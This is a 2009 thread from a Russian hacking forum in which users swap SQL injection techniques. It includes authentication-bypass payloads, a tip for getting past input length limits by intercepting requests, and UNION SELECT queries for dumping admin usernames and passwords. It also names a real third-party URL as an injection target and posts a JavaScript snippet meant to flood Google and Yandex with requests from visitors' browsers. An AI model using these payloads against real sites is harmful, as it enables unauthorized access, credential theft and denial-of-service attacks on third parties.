ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.01.2009, 19:34
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Сообщение от ronald
А как реализовывается обход авторизации к примеру в данном случае
SELECT * FROM adminpanel WHERE pass = ' ' ?
если уязвимо поле pass то в это поле пишем
Код:
12345' OR login='admin'; --
запрос станет таким
Код:
SELECT * FROM adminpanel WHERE (login='admin' AND pass='12345') OR (login='admin');
авторизация будет успешна пройдена под логином admin
|
|
|

10.01.2009, 19:38
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме: 800727
Репутация:
83
|
|
там ограничение на длину=7
|
|
|

10.01.2009, 19:40
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Сообщение от ronald
там ограничение на длину=7
линк в студию =)
|
|
|

10.01.2009, 19:43
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
' or 1/*
Тут 8, если ограничение только в форме, перехватывай пакет
|
|
|

10.01.2009, 20:41
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
что это?)
http://www.productdose.com/index.php?cat_id=2+or+1=1
|
|
|

10.01.2009, 20:42
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
' or 1#
7 
|
|
|

11.01.2009, 05:43
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме: 349682
Репутация:
30
|
|
Всем привет.
Подскажите, нипАнятна.
пытаюсь вывести данные из колонки admin:
=-345+union+select+1,2,concat_ws(0x3a,admin_user,adm in_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+admin--
Ничего не выводит. Пробую лимит, тоже самое. Хэксил - пусто.
Пишу:
=-345+union+select+1,2,count(*),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+admin--
Выводит число 149
Чиво делаю не правильно?
|
|
|

11.01.2009, 07:08
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Попробуй без concat'а.
Код:
-345+union+select+1,2,admin_password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+admin--
|
|
|

11.01.2009, 07:47
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме: 349682
Репутация:
30
|
|
R1dex, уже пробовал, не катит. хммммм...
|
|
|

11.01.2009, 07:54
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
кто что знает от xss ddos?
например через функцию ajax:
setInterval("ajaxFunction()",5)
или вот это:
var req;
var targets = new Array("http://google.com","http://yandex.ru");
function SendHTTP(url) {
req = false;
if (window.XMLHttpRequest) { // не ИЕ
req = new XMLHttpRequest();
} else if (window.ActiveXObject) { // ИЕ
req = new ActiveXObject("Microsoft.XMLHTTP");
}
if (req) {
req.open("GET", url, true);
req.send();
}
}
function terror() {
for (i=0;i<targets.length;i++) {
SendHTTP(targets[i]);
}
}
Последний раз редактировалось sabe; 11.01.2009 в 08:55..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|